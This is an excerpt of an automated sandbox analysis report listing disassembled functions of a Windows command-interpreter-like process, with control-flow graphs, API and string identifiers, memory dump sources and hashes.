                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1809961153-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d28b187de5df886c849393368fe11504ded461ab225ca9f976165d27fccd3d44
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D14E22A0CB8585EA60EB15EC642BBF7A1FF84760F848136DA4E437A4DF3CE546C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 914 7ff706ec2394-7ff706ec2416 memset call 7ff706ebca40 917 7ff706ece0d2-7ff706ece0da call 7ff706ec4c1c 914->917 918 7ff706ec241c-7ff706ec2453 GetModuleFileNameW call 7ff706ec081c 914->918 923 7ff706ece0db-7ff706ece0ee call 7ff706ec498c 917->923 918->923 924 7ff706ec2459-7ff706ec2468 call 7ff706ec081c 918->924 929 7ff706ece0f4-7ff706ece107 call 7ff706ec498c 923->929 924->929 930 7ff706ec246e-7ff706ec247d call 7ff706ec081c 924->930 937 7ff706ece10d-7ff706ece123 929->937 935 7ff706ec2516-7ff706ec2529 call 7ff706ec498c 930->935 936 7ff706ec2483-7ff706ec2492 call 7ff706ec081c 930->936 935->936 936->937 944 7ff706ec2498-7ff706ec24a7 call 7ff706ec081c 936->944 940 7ff706ece125-7ff706ece139 wcschr 937->940 941 7ff706ece13f-7ff706ece17a _wcsupr 937->941 940->941 945 7ff706ece27c 940->945 946 7ff706ece181-7ff706ece199 wcsrchr 941->946 947 7ff706ece17c-7ff706ece17f 941->947 954 7ff706ece2a1-7ff706ece2c3 _wcsicmp 944->954 955 7ff706ec24ad-7ff706ec24c5 call 7ff706ec3c24 944->955 949 7ff706ece283-7ff706ece29b call 7ff706ec498c 945->949 950 7ff706ece19c 946->950 947->950 949->954 953 7ff706ece1a0-7ff706ece1a7 950->953 953->953 957 7ff706ece1a9-7ff706ece1bb 953->957 963 7ff706ec24ca-7ff706ec24db 955->963 958 7ff706ece264-7ff706ece277 call 7ff706ec1300 957->958 959 7ff706ece1c1-7ff706ece1e6 957->959 958->945 961 7ff706ece1e8-7ff706ece1f1 959->961 962 7ff706ece21a 959->962 965 7ff706ece1f3-7ff706ece1f6 961->965 966 7ff706ece201-7ff706ece210 961->966 969 7ff706ece21d-7ff706ece21f 962->969 967 7ff706ec24e9-7ff706ec2514 call 7ff706ec8f80 963->967 968 7ff706ec24dd-7ff706ec24e4 ??_V@YAXPEAX@Z 963->968 965->966 970 7ff706ece1f8-7ff706ece1ff 965->970 966->962 971 7ff706ece212-7ff706ece218 966->971 968->967 969->949 973 7ff706ece221-7ff706ece228 969->973 970->965 970->966 971->969 975 7ff706ece254-7ff706ece262 973->975 976 7ff706ece22a-7ff706ece231 973->976 975->945 977 7ff706ece234-7ff706ece237 976->977 977->975 978 7ff706ece239-7ff706ece242 977->978 978->975 979 7ff706ece244-7ff706ece252 978->979 979->975 979->977
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2622545777-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 82393b5b22ca6b85eb5985e178a3d1b42226ee55b58f3f127dba0449f8d9af95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD915166B09B86C5EE24AB54DC706FAA3A1FF48B94FC44135D90E47695EF3CE50AC320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aefa3570ffdd2f50702d24f757001fda33ec732f0e566585414b1663ffdb4bbb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C941FE39A09B42CBE7146B14EC641BAFBA0FF89B55FC5D179C90E473A0DF3DA4058660
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 992 7ff706ebc620-7ff706ebc66f GetConsoleTitleW 993 7ff706ebc675-7ff706ebc687 call 7ff706ebaf14 992->993 994 7ff706ecc5f2 992->994 998 7ff706ebc689 993->998 999 7ff706ebc68e-7ff706ebc69d call 7ff706ebca40 993->999 996 7ff706ecc5fc-7ff706ecc60c GetLastError 994->996 1000 7ff706ecc5e3 call 7ff706eb3278 996->1000 998->999 1004 7ff706ecc5e8-7ff706ecc5ed call 7ff706ec855c 999->1004 1005 7ff706ebc6a3-7ff706ebc6ac 999->1005 1000->1004 1004->994 1007 7ff706ebc6b2-7ff706ebc6c5 call 7ff706ebb9c0 1005->1007 1008 7ff706ebc954-7ff706ebc95e call 7ff706ec291c 1005->1008 1015 7ff706ebc9b5-7ff706ebc9b8 call 7ff706ec5c6c 1007->1015 1016 7ff706ebc6cb-7ff706ebc6ce 1007->1016 1013 7ff706ebc964-7ff706ebc972 call 7ff706eb89c0 1008->1013 1014 7ff706ecc5de-7ff706ecc5e0 1008->1014 1013->996 1024 7ff706ebc978-7ff706ebc99a towupper 1013->1024 1014->1000 1023 7ff706ebc9bd-7ff706ebc9c9 call 7ff706ec855c 1015->1023 1016->1004 1018 7ff706ebc6d4-7ff706ebc6e9 1016->1018 1021 7ff706ecc616-7ff706ecc620 call 7ff706ec855c 1018->1021 1022 7ff706ebc6ef-7ff706ebc6fa 1018->1022 1026 7ff706ecc627 1021->1026 1025 7ff706ebc700-7ff706ebc713 1022->1025 1022->1026 1037 7ff706ebc9d0-7ff706ebc9d7 1023->1037 1029 7ff706ebc9a0-7ff706ebc9a9 1024->1029 1030 7ff706ecc631 1025->1030 1031 7ff706ebc719-7ff706ebc72c 1025->1031 1026->1030 1029->1029 1034 7ff706ebc9ab-7ff706ebc9af 1029->1034 1036 7ff706ecc63b 1030->1036 1035 7ff706ebc732-7ff706ebc747 call 7ff706ebd3f0 1031->1035 1031->1036 1034->1015 1038 7ff706ecc60e-7ff706ecc611 call 7ff706edec14 1034->1038 1045 7ff706ebc74d-7ff706ebc750 1035->1045 1046 7ff706ebc8ac-7ff706ebc8af 1035->1046 1042 7ff706ecc645 1036->1042 1040 7ff706ebc872-7ff706ebc8aa call 7ff706ec855c call 7ff706ec8f80 1037->1040 1041 7ff706ebc9dd-7ff706ecc6da SetConsoleTitleW 1037->1041 1038->1021 1041->1040 1053 7ff706ecc64e-7ff706ecc651 1042->1053 1049 7ff706ebc752-7ff706ebc764 call 7ff706ebbd38 1045->1049 1050 7ff706ebc76a-7ff706ebc76d 1045->1050 1046->1045 1052 7ff706ebc8b5-7ff706ebc8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff706ebc840-7ff706ebc84b call 7ff706ebcb40 1050->1056 1057 7ff706ebc773-7ff706ebc77a 1050->1057 1052->1050 1058 7ff706ebc8d9 1052->1058 1059 7ff706ecc657-7ff706ecc65b 1053->1059 1060 7ff706ebc80d-7ff706ebc811 1053->1060 1077 7ff706ebc856-7ff706ebc86c 1056->1077 1078 7ff706ebc84d-7ff706ebc855 call 7ff706ebcad4 1056->1078 1065 7ff706ebc780-7ff706ebc784 1057->1065 1058->1045 1059->1060 1061 7ff706ebc9e2-7ff706ebc9e7 1060->1061 1062 7ff706ebc817-7ff706ebc81b 1060->1062 1061->1062 1069 7ff706ebc9ed-7ff706ebc9f7 call 7ff706ec291c 1061->1069 1067 7ff706ebc821 1062->1067 1068 7ff706ebca1b-7ff706ebca1f 1062->1068 1070 7ff706ebc78a-7ff706ebc7a4 wcschr 1065->1070 1071 7ff706ebc83d 1065->1071 1073 7ff706ebc824-7ff706ebc82d 1067->1073 1068->1067 1079 7ff706ebca25-7ff706ecc6b3 call 7ff706eb3278 1068->1079 1087 7ff706ecc684-7ff706ecc698 call 7ff706eb3278 1069->1087 1088 7ff706ebc9fd-7ff706ebca00 1069->1088 1075 7ff706ebc7aa-7ff706ebc7ad 1070->1075 1076 7ff706ebc8de-7ff706ebc8f7 1070->1076 1071->1056 1073->1073 1080 7ff706ebc82f-7ff706ebc837 1073->1080 1082 7ff706ebc7b0-7ff706ebc7b8 1075->1082 1083 7ff706ebc900-7ff706ebc908 1076->1083 1077->1037 1077->1040 1078->1077 1079->1004 1080->1065 1080->1071 1082->1082 1089 7ff706ebc7ba-7ff706ebc7c7 1082->1089 1083->1083 1090 7ff706ebc90a-7ff706ebc915 1083->1090 1087->1004 1088->1062 1094 7ff706ebca06-7ff706ebca10 call 7ff706eb89c0 1088->1094 1089->1053 1095 7ff706ebc7cd-7ff706ebc7db 1089->1095 1096 7ff706ebc93a-7ff706ebc944 1090->1096 1097 7ff706ebc917 1090->1097 1094->1062 1113 7ff706ebca16-7ff706ecc67f GetLastError call 7ff706eb3278 1094->1113 1102 7ff706ebc7e0-7ff706ebc7e7 1095->1102 1099 7ff706ebca2a-7ff706ebca2f call 7ff706ec9158 1096->1099 1100 7ff706ebc94a 1096->1100 1103 7ff706ebc920-7ff706ebc928 1097->1103 1099->1014 1100->1008 1106 7ff706ebc800-7ff706ebc803 1102->1106 1107 7ff706ebc7e9-7ff706ebc7f1 1102->1107 1108 7ff706ebc932-7ff706ebc938 1103->1108 1109 7ff706ebc92a-7ff706ebc92f 1103->1109 1106->1042 1111 7ff706ebc809 1106->1111 1107->1106 1114 7ff706ebc7f3-7ff706ebc7fe 1107->1114 1108->1096 1108->1103 1109->1108 1111->1060 1113->1004 1114->1102 1114->1106
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2364928044-4222935259
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cdef8811c7da3924b11e5a175cac4be91fba1452734177d3531fa0845580e7f0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC19E61A1C74281FA64BB25DC242BBE2A1FF91F94FE46231DA1E472D5DF7CE8458320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1171 7ff706ec8d80-7ff706ec8da2 1172 7ff706ec8da4-7ff706ec8daf 1171->1172 1173 7ff706ec8db1-7ff706ec8db4 1172->1173 1174 7ff706ec8dcc 1172->1174 1175 7ff706ec8db6-7ff706ec8dbd 1173->1175 1176 7ff706ec8dbf-7ff706ec8dca Sleep 1173->1176 1177 7ff706ec8dd1-7ff706ec8dd9 1174->1177 1175->1177 1176->1172 1178 7ff706ec8ddb-7ff706ec8de5 _amsg_exit 1177->1178 1179 7ff706ec8de7-7ff706ec8def 1177->1179 1180 7ff706ec8e4c-7ff706ec8e54 1178->1180 1181 7ff706ec8e46 1179->1181 1182 7ff706ec8df1-7ff706ec8e0a 1179->1182 1183 7ff706ec8e73-7ff706ec8e75 1180->1183 1184 7ff706ec8e56-7ff706ec8e69 _initterm 1180->1184 1181->1180 1185 7ff706ec8e0e-7ff706ec8e11 1182->1185 1186 7ff706ec8e80-7ff706ec8e88 1183->1186 1187 7ff706ec8e77-7ff706ec8e79 1183->1187 1184->1183 1188 7ff706ec8e13-7ff706ec8e15 1185->1188 1189 7ff706ec8e38-7ff706ec8e3a 1185->1189 1190 7ff706ec8eb4-7ff706ec8ec8 call 7ff706ec37d8 1186->1190 1191 7ff706ec8e8a-7ff706ec8e98 call 7ff706ec94f0 1186->1191 1187->1186 1192 7ff706ec8e3c-7ff706ec8e41 1188->1192 1193 7ff706ec8e17-7ff706ec8e1b 1188->1193 1189->1180 1189->1192 1200 7ff706ec8ecd-7ff706ec8eda 1190->1200 1191->1190 1201 7ff706ec8e9a-7ff706ec8eaa 1191->1201 1194 7ff706ec8f28-7ff706ec8f3d 1192->1194 1196 7ff706ec8e2d-7ff706ec8e36 1193->1196 1197 7ff706ec8e1d-7ff706ec8e29 1193->1197 1196->1185 1197->1196 1203 7ff706ec8ee4-7ff706ec8eeb 1200->1203 1204 7ff706ec8edc-7ff706ec8ede exit 1200->1204 1201->1190 1205 7ff706ec8eed-7ff706ec8ef3 _cexit 1203->1205 1206 7ff706ec8ef9 1203->1206 1204->1203 1205->1206 1206->1194
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4291973834-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 43c635820e7093ad927d14dc742e0d53afb63bf360faaca3e0890e8d8404c32f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA412839E08B4786FB50BB10EE6027BABA0BF54368FC41436D91D476A4DF7CE8458764
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23256dfd2f732df175e6b73b052b73006fca6669f12a3d168bc46ea9cf5c2c03
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012D35908B82CAE6047B55AC641BAFA61FF8A759FC45174D54F07396DF3C90448B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF706EC3106
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
